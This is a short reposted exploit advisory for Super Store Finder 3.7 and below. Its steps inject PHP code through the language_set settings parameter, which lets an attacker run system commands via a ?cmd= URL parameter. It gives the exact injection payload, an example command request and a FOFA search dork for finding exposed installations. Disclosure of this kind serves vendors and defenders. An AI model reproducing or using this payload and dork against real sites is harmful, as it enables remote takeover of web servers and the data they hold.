Super Store Finder 3.7 Remote Command Execution
2023-9-21 00:22:7 Author: cxsecurity.com(查看原文) 阅读量:3 收藏

# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote Code Execution # Researcher : Etharus # Vendor : Joe Iz, https://www.superstorefinder.net/ # Demo Url : https://superstorefinder.net/products/superstorefinder/ # Version Affected : 3.7 and below # Date : 18 September 2023 # FOFA Dork : "designed and built by Joe Iz." # Step 1 : Login as user/admin # Step 2 : Go to Settings on right top # Step 3 : Turn on proxy to intercept request and save the settings # Step 4 : On language_set parameter set the value to en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);// # Step 5 : Due to index.php called config.inc.php , we just can go for rce with parameter ?cmd= # Step 6 : Example. http://localhost/?cmd=uname%20-a



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2023090065
如有侵权请联系:admin#unsafe.sh